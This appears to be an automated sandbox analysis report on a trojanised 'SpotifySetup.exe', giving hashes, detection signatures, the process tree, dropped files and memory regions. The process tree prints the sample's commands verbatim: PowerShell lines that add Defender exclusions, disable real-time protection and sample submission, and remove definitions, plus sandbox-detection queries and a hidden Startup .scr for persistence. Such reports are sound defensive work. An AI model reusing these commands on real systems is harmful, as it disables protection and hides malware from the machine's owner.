Analysis

  • max time kernel
    209s
  • max time network
    206s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-06-2024 23:35

General

  • Target

    SpotifySetup.exe

  • Size

    6.8MB

  • MD5

    e58de2d31fe7a07e75f79e76ca79ba95

  • SHA1

    a918c93c009c84f98c055926da540558342be0df

  • SHA256

    b4579cb6e46b23c09e34d93fbd190e32ae7a407e5dedba99dcabcdd4b3acc7f1

  • SHA512

    ae6ebeb52c720c5e546bddbeacae2b72f19bdfe4fd21dbbf2b6d6fdfebb21eabfb752dc6f6b76cf365345f686668df290da80756f68d70757818aed49d23ade0

  • SSDEEP

    196608:ZRuyH1g16gQ49hoy6Enwc4GgpG0REtHIrq7LrtrbWOjgWyI:ZcXZWyotGgpGLtz7ntrbvMWyI

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • ACProtect 1.3x - 1.4x DLL software 16 IoCs

    Detects file using ACProtect software.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • UPX packed file 46 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
    "C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3996
    • C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe
      "C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3308
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5032
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4784
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2236
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4932
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:548
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3708
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4572
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:908
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4992
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2908
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1088
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2216
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4796
        • C:\Windows\SysWOW64\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:2660
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3280
          • C:\Windows\SysWOW64\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:3664
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2836
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:4304
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3484
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:3076
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
            3⤵
              PID:4668
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2396
        • C:\Windows\system32\taskmgr.exe
          "C:\Windows\system32\taskmgr.exe" /4
          1⤵
          • Checks SCSI registry key(s)
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:4712
        • C:\Windows\System32\rundll32.exe
          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          1⤵
            PID:1980

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\     .scr
            Filesize

            6.8MB

            MD5

            e58de2d31fe7a07e75f79e76ca79ba95

            SHA1

            a918c93c009c84f98c055926da540558342be0df

            SHA256

            b4579cb6e46b23c09e34d93fbd190e32ae7a407e5dedba99dcabcdd4b3acc7f1

            SHA512

            ae6ebeb52c720c5e546bddbeacae2b72f19bdfe4fd21dbbf2b6d6fdfebb21eabfb752dc6f6b76cf365345f686668df290da80756f68d70757818aed49d23ade0

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            968cb9309758126772781b83adb8a28f

            SHA1

            8da30e71accf186b2ba11da1797cf67f8f78b47c

            SHA256

            92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

            SHA512

            4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            8ac5e780bfc82dd50924c40aa73fe81a

            SHA1

            6454c7fc3b018d9eb61e25987a462c56a2f716cc

            SHA256

            9f75e7f0fef7bade8708623e601335f991cfb2d7b1b1092ca45ac691c2927c71

            SHA512

            4ddfe91f7c543cb1ce50bc07de137e60e1f104c64c3142600550fb1d20dc2ea123095f6364f15a8ba9acaf0cbb15c91b08c6cf31decefc27c82efc4cbb01ab8d

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\VCRUNTIME140.dll
            Filesize

            78KB

            MD5

            1e6e97d60d411a2dee8964d3d05adb15

            SHA1

            0a2fe6ec6b6675c44998c282dbb1cd8787612faf

            SHA256

            8598940e498271b542f2c04998626aa680f2172d0ff4f8dbd4ffec1a196540f9

            SHA512

            3f7d79079c57786051a2f7facfb1046188049e831f12b549609a8f152664678ee35ad54d1fff4447428b6f76bea1c7ca88fa96aab395a560c6ec598344fcc7fa

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\_bz2.pyd
            Filesize

            43KB

            MD5

            93c79a5faaa4d320432b06ae2879f1f4

            SHA1

            772b881874a3947f2205644df6eba5972366aab6

            SHA256

            02eda0188e989264ffb5bfe4474ef1bfa36f8a0baee6764e11b4aa604cc30d47

            SHA512

            4757e41fa5260601246ee851d43fcffa17eb591dd4e5f987e18b77d9c3269431a610f9b32ebc507c64394c29afe3f7c030d5448417490431742c6c462f156b06

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\_ctypes.pyd
            Filesize

            51KB

            MD5

            35001f868cbc1c3dcd337b1915356b09

            SHA1

            4b1c0e51ed920d29894739db618952632d6275aa

            SHA256

            7753972db061b3fd543ec69ed478e05fe6d98e56960c3bdfaa101164a2508fbd

            SHA512

            fa9628a69fc532b3805cca46d4cdbdb40ac4a8187d87fd469b522797368d588d16a2cb286c43544137849858444f71410deed90dde0cac5a34c9c55d69ddf1ac

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\_decimal.pyd
            Filesize

            77KB

            MD5

            b6f3b12773dceb50350a472a52c67b74

            SHA1

            2b260ccc29d576bb3c7b6e845f1aec2df0028f81

            SHA256

            65ddf0408964eaf41946abf0a28e75023e8a872595056b0d9cdb15c5addc71bf

            SHA512

            bddb3927bb91a82c8d755b5f17e17d5ad8b56d6f24471fecc8ff37e09c12c6750f583a0199114539185fec17e46f49fe7c381c449bd799dacefdd4cbbbfc7750

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\_hashlib.pyd
            Filesize

            28KB

            MD5

            368c589936dd438ab4ba01e699b2d057

            SHA1

            66a0a47a210279066d7d6906fc0502b6d0136ab7

            SHA256

            35bb95a6c8dd259ccc7ee01ef2c5142d83a41c188bfc1a7d888e3b6988e8e3b7

            SHA512

            61df0fbd6d668d1aae6555a0199bf6e1c28437d3a3e7bf190c4818908cbcb64d08d6d745b01a692cc2fea6ba101521223da2648f6438870249bd5f3ea5e549f4

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\_lzma.pyd
            Filesize

            78KB

            MD5

            945c87e35009c0e335a5798d26a6bff5

            SHA1

            d154e1dbe948ea34c49c598ecb1ba5046ce5701e

            SHA256

            77e99912e32361e6af44676c841f1da7f028cd01886af6173bd25a8b6c97c748

            SHA512

            130a0028828d4509bb014be3add814bc638851b8522e1b49c960689435978737b77d892f2aa35e830736f2ed0166dace753b5422a85e14c4a75310488c28748c

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\_queue.pyd
            Filesize

            23KB

            MD5

            f43666bf65895bfbae75047bb1c6e3bc

            SHA1

            68bdbbc96c1e0fd742baf12e70cb3f7bcf3c36bd

            SHA256

            99575c81cd208c47b6cc4c61624ac65c31b91ea957b68d5c3c82a6a6c37cfa70

            SHA512

            90bbf0749498caec97ad754d844f3d6430aeac2a38e9f8a93ccc1bea4fdc71290a1496ba68d9932588ccad22fbf0d20a8df2a651ca310cfac81b632a04a0f271

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\_socket.pyd
            Filesize

            37KB

            MD5

            c3f890e3039c68572f16de4bc34d6ca1

            SHA1

            d6eb20ec639643a162715c3b631ae5edbd23fae2

            SHA256

            bc28c36960b8028adc4fe2cc868df2b5c7778b4d4b0c7e15dd0b02a70ac1f5a2

            SHA512

            ad95294e61391d245ddc4ed139d9765678bb5611f45808e3c985666b53da56f2afd4a46697d937ed1941d7ec64108dc4eaf39144041dc66a65626c7e9dfba90e

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\_sqlite3.pyd
            Filesize

            43KB

            MD5

            0a68f6c9a099a00a5ce26d1a3951dda9

            SHA1

            b03bb0db3f5fe67450878ea141d68e77cad5e2aa

            SHA256

            ec9d4b312ea445806b50e00f1e4467d4923386e2220af80aae2a759cf633954f

            SHA512

            ad9dbeabae6fae3f302cae363b8591241adc443f5aade9ac950ebd8f705d4d168f6ef921bc433d45f6ac34055e83fbbbe0d51ee188605b11bda049d4db99fe47

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\_ssl.pyd
            Filesize

            56KB

            MD5

            92940dcc7b644481d182f58ec45623e7

            SHA1

            374dbf370ee3a4659a600545ef4e4ba2b699dfea

            SHA256

            b4d3b352a4aef999497738a30236f9d96e56b1fc92fd268c1736f74c902315f9

            SHA512

            3ee1d32ff4caa89ea98b8def89b9c22b32199bb3cb0196add71975b260be898138d6a97db1ff2e7c6996dd0ddd03cbecdf32c83f381c1655bb8ad4ea8bb46569

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\base_library.zip
            Filesize

            1.4MB

            MD5

            83d235e1f5b0ee5b0282b5ab7244f6c4

            SHA1

            629a1ce71314d7abbce96674a1ddf9f38c4a5e9c

            SHA256

            db389a9e14bfac6ee5cce17d41f9637d3ff8b702cc74102db8643e78659670a0

            SHA512

            77364aff24cfc75ee32e50973b7d589b4a896d634305d965ecbc31a9e0097e270499dbec93126092eb11f3f1ad97692db6ca5927d3d02f3d053336d6267d7e5f

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\blank.aes
            Filesize

            118KB

            MD5

            7b1b41206b5b4b4f182f044a3036306b

            SHA1

            9ff98ad41260b4157e822bb9d06194b8652676c8

            SHA256

            041febaacd13992e55754900a3fa0a6a6e9e4a71c5cad600a893243d58e56af2

            SHA512

            ab6af1cf948078c0883abaf49fe9fbce12887e5d26333ac811beb3de7d216a79ffd09a147bff382d9c70579ae558be773adc76b453d381b4758cea1afb745eda

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\bound.blank
            Filesize

            839KB

            MD5

            cf4fffa69f4ff17db11a7ee6f1a83cde

            SHA1

            b2a76797b0b53e28120e90adc489045c09b53676

            SHA256

            eafbe0db258e12897330cacaba4f73179c9768c1dcb0d1f6d6df2620cfa84958

            SHA512

            d22835a8d04407365bbb49179f1f75e26dd42d0f3fad2b1a266a2c1d67e6606a535faec0e63222536f5891e00445cdacaf56f3a67a953bfc746738ad892d8c63

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\libcrypto-1_1.dll
            Filesize

            753KB

            MD5

            f05c8bbd35947b9019ef5f1d427cb07e

            SHA1

            8703df14305dc624a59808884d71e73877d509b4

            SHA256

            2267f63a35fd3ff9599867a87fcb8123ea0e872a275f236a053ce8b1d13642d6

            SHA512

            706058940f03e84045217cf99df0bf2a1e3cafd9ae61daa79acffa863b5403142859c1b66901d4a4deebec77b5e3c4674efa862f01211218f377d02a0a3aa19f

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\libffi-8.dll
            Filesize

            23KB

            MD5

            df5514796b647481d295b14a43f5287f

            SHA1

            cf52bf55d81d98c46142117fb82d2a9dc7da1b41

            SHA256

            1e1f2e32114e5c20b1b804c92618318e7a1a7524162a73155e5e1653d08f7b77

            SHA512

            379d4db1952f9c3a21192e27d98fd9635b66bd928e448c8725d4d9ef479099674863055703b45ac4aefd9ae478994b69948c87b558db092944d1d636e146016a

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\libssl-1_1.dll
            Filesize

            171KB

            MD5

            f3d3487191db4bbecc0a775cde827cc1

            SHA1

            43fef4f4de1185d7ca4dd5e8fa018a57e87b3d31

            SHA256

            22a0c62fd88787fd64845a9522747f5d960fb3b53b47272b75b96c67524ee222

            SHA512

            01c957c17d0e37203294b2a7d9fb75fee00e9c854e9b98d847befc5e7bcd9b6e053207fd9b41796e76e95b691324e2545300d1b8434a7da9207998f39b5295cd

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\python311.dll
            Filesize

            1.4MB

            MD5

            0e06f85bcfb1c684469ce62e35b5c272

            SHA1

            73122369425c1fec9a035975a1834139f6869279

            SHA256

            6209e55cae73ab3d7bb19a80cd4fb9981b6a3db75bcd5036e84084b23956d9f8

            SHA512

            c4077f23bf2bc1b2826ad85b4955419b4f79c1bba144372e6706ee8e07ea252d820fdb8c43a6fdd4020fa1e468aff287df443a42b2fdcbd9f41d56f5bbe83b4f

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\rar.exe
            Filesize

            615KB

            MD5

            9c223575ae5b9544bc3d69ac6364f75e

            SHA1

            8a1cb5ee02c742e937febc57609ac312247ba386

            SHA256

            90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

            SHA512

            57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\rarreg.key
            Filesize

            456B

            MD5

            4531984cad7dacf24c086830068c4abe

            SHA1

            fa7c8c46677af01a83cf652ef30ba39b2aae14c3

            SHA256

            58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

            SHA512

            00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\select.pyd
            Filesize

            23KB

            MD5

            1ecea4488c6503337c5fd9d50c8fb638

            SHA1

            31c61c788dab5dc58ff479af7eff758a0229253c

            SHA256

            f20251e6571c43f4ecbbe00e72637f91605886dd76c77557edf7979f71c07d0e

            SHA512

            c7011d4d67cef3e4a7b1e096dfc0633fcedc4f287676039833c89966995b673c6fb8456e595ba49260dbc7b9bda523256344c4814fa2f8bd10af290861a3b8b6

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\sqlite3.dll
            Filesize

            496KB

            MD5

            fdbc1adfdeb07195f85bf551cf03a0de

            SHA1

            94dcf3ec50759ee92335f02fc0f3d9e60305e740

            SHA256

            563d0bc6b5a401f2c66f67ccaa19c50084b67433ec440bb9cf0a8d81ee269c55

            SHA512

            bd567a4c6b4627556b02f4299d1b8a9aa7affae0aafbe5a10c92c7e5a08e7f8cbda497f27c01d1ff4352ff1dc1c2fe3c79ff9484e58e6357c96c9a064f5011ea

          • C:\Users\Admin\AppData\Local\Temp\_MEI39962\unicodedata.pyd
            Filesize

            291KB

            MD5

            bb3d050b8a75f478e4b29897eae427b0

            SHA1

            1930808a59a8fd9c57ed6039e7614697b4cb03d9

            SHA256

            06af11548b8a58fed50ae7dbe2fcfbbf04b890926e0fffd70eed02aecc0d97c6

            SHA512

            be596e2829c6978d7f138f79059172024ee73cd3e1f3d7a24aaca4b0d85a2302e2060e6cebd54854e7f08ed66b665429d38bb22c512dd82533d8ba87a426f515

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgoleqnr.jz5.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\bound.exe
            Filesize

            1.4MB

            MD5

            85091f0dca9adc1bc302eba94fd1398d

            SHA1

            36d336b4c6ba61112e4f98a8af96605d9a49afbe

            SHA256

            3b1aa1f5485cd77a5a736b336ed189ac4e837a699acd36fc415c2bc7cb4748de

            SHA512

            0a98f92a9b1c0e57bd7a4526895a1a0177a3a4783c6b5ee9beee09e3de7b30c97210336e7fca115ed39af7626446b22db7511b508a4280f45b077286225f7888

          • memory/908-188-0x00007FF6075E0000-0x00007FF607754000-memory.dmp
            Filesize

            1.5MB

          • memory/908-87-0x00007FF6075E0000-0x00007FF607754000-memory.dmp
            Filesize

            1.5MB

          • memory/2396-230-0x0000000007DF0000-0x0000000007E01000-memory.dmp
            Filesize

            68KB

          • memory/2396-231-0x0000000007E40000-0x0000000007E54000-memory.dmp
            Filesize

            80KB

          • memory/2396-216-0x0000000006340000-0x0000000006694000-memory.dmp
            Filesize

            3.3MB

          • memory/2396-218-0x0000000006910000-0x000000000695C000-memory.dmp
            Filesize

            304KB

          • memory/2396-219-0x0000000070370000-0x00000000703BC000-memory.dmp
            Filesize

            304KB

          • memory/2396-229-0x0000000007B50000-0x0000000007BF3000-memory.dmp
            Filesize

            652KB

          • memory/3308-56-0x00000000755C0000-0x00000000755E7000-memory.dmp
            Filesize

            156KB

          • memory/3308-73-0x00000000750A0000-0x00000000752FA000-memory.dmp
            Filesize

            2.4MB

          • memory/3308-79-0x0000000075600000-0x000000007561F000-memory.dmp
            Filesize

            124KB

          • memory/3308-76-0x0000000075650000-0x0000000075B5B000-memory.dmp
            Filesize

            5.0MB

          • memory/3308-83-0x00000000755F0000-0x00000000755FD000-memory.dmp
            Filesize

            52KB

          • memory/3308-84-0x0000000074EF0000-0x0000000075009000-memory.dmp
            Filesize

            1.1MB

          • memory/3308-66-0x00000000753D0000-0x00000000753DC000-memory.dmp
            Filesize

            48KB

          • memory/3308-62-0x0000000075440000-0x0000000075577000-memory.dmp
            Filesize

            1.2MB

          • memory/3308-60-0x0000000075580000-0x000000007559B000-memory.dmp
            Filesize

            108KB

          • memory/3308-248-0x0000000075650000-0x0000000075B5B000-memory.dmp
            Filesize

            5.0MB

          • memory/3308-233-0x0000000075650000-0x0000000075B5B000-memory.dmp
            Filesize

            5.0MB

          • memory/3308-77-0x0000000075030000-0x0000000075040000-memory.dmp
            Filesize

            64KB

          • memory/3308-58-0x00000000755A0000-0x00000000755B8000-memory.dmp
            Filesize

            96KB

          • memory/3308-65-0x0000000075420000-0x0000000075436000-memory.dmp
            Filesize

            88KB

          • memory/3308-72-0x0000000075300000-0x0000000075394000-memory.dmp
            Filesize

            592KB

          • memory/3308-80-0x0000000075020000-0x000000007502C000-memory.dmp
            Filesize

            48KB

          • memory/3308-74-0x0000000003D30000-0x0000000003F8A000-memory.dmp
            Filesize

            2.4MB

          • memory/3308-68-0x00000000753A0000-0x00000000753C8000-memory.dmp
            Filesize

            160KB

          • memory/3308-190-0x0000000075650000-0x0000000075B5B000-memory.dmp
            Filesize

            5.0MB

          • memory/3308-189-0x0000000003D30000-0x0000000003F8A000-memory.dmp
            Filesize

            2.4MB

          • memory/3308-33-0x00000000755F0000-0x00000000755FD000-memory.dmp
            Filesize

            52KB

          • memory/3308-173-0x0000000075600000-0x000000007561F000-memory.dmp
            Filesize

            124KB

          • memory/3308-179-0x0000000075420000-0x0000000075436000-memory.dmp
            Filesize

            88KB

          • memory/3308-181-0x00000000753A0000-0x00000000753C8000-memory.dmp
            Filesize

            160KB

          • memory/3308-182-0x0000000075300000-0x0000000075394000-memory.dmp
            Filesize

            592KB

          • memory/3308-183-0x00000000750A0000-0x00000000752FA000-memory.dmp
            Filesize

            2.4MB

          • memory/3308-186-0x0000000074EF0000-0x0000000075009000-memory.dmp
            Filesize

            1.1MB

          • memory/3308-187-0x0000000075440000-0x0000000075577000-memory.dmp
            Filesize

            1.2MB

          • memory/3308-172-0x0000000075650000-0x0000000075B5B000-memory.dmp
            Filesize

            5.0MB

          • memory/3308-171-0x0000000075580000-0x000000007559B000-memory.dmp
            Filesize

            108KB

          • memory/3308-30-0x0000000075600000-0x000000007561F000-memory.dmp
            Filesize

            124KB

          • memory/3308-26-0x0000000075650000-0x0000000075B5B000-memory.dmp
            Filesize

            5.0MB

          • memory/3708-164-0x0000000007C00000-0x0000000007C1A000-memory.dmp
            Filesize

            104KB

          • memory/3708-161-0x0000000007AC0000-0x0000000007AD1000-memory.dmp
            Filesize

            68KB

          • memory/3708-91-0x00000000055F0000-0x0000000005612000-memory.dmp
            Filesize

            136KB

          • memory/3708-147-0x000000006FFA0000-0x000000006FFEC000-memory.dmp
            Filesize

            304KB

          • memory/4784-124-0x00000000062D0000-0x0000000006302000-memory.dmp
            Filesize

            200KB

          • memory/4784-135-0x000000006FFA0000-0x000000006FFEC000-memory.dmp
            Filesize

            304KB

          • memory/4784-159-0x00000000070B0000-0x00000000070BA000-memory.dmp
            Filesize

            40KB

          • memory/4784-90-0x0000000004FC0000-0x00000000055E8000-memory.dmp
            Filesize

            6.2MB

          • memory/4784-163-0x0000000007280000-0x0000000007294000-memory.dmp
            Filesize

            80KB

          • memory/4784-162-0x0000000007270000-0x000000000727E000-memory.dmp
            Filesize

            56KB

          • memory/4784-146-0x0000000006EE0000-0x0000000006F83000-memory.dmp
            Filesize

            652KB

          • memory/4784-122-0x0000000005CF0000-0x0000000005D0E000-memory.dmp
            Filesize

            120KB

          • memory/4784-123-0x0000000005D20000-0x0000000005D6C000-memory.dmp
            Filesize

            304KB

          • memory/4784-160-0x00000000072C0000-0x0000000007356000-memory.dmp
            Filesize

            600KB

          • memory/4932-125-0x000000006FFA0000-0x000000006FFEC000-memory.dmp
            Filesize

            304KB

          • memory/4932-145-0x0000000006640000-0x000000000665E000-memory.dmp
            Filesize

            120KB

          • memory/4932-165-0x00000000076F0000-0x00000000076F8000-memory.dmp
            Filesize

            32KB

          • memory/4932-103-0x0000000005BC0000-0x0000000005F14000-memory.dmp
            Filesize

            3.3MB

          • memory/4932-157-0x0000000007A20000-0x000000000809A000-memory.dmp
            Filesize

            6.5MB

          • memory/4932-92-0x0000000005320000-0x0000000005386000-memory.dmp
            Filesize

            408KB

          • memory/4932-93-0x0000000005390000-0x00000000053F6000-memory.dmp
            Filesize

            408KB

          • memory/4932-158-0x00000000073D0000-0x00000000073EA000-memory.dmp
            Filesize

            104KB

          • memory/4932-89-0x0000000002840000-0x0000000002876000-memory.dmp
            Filesize

            216KB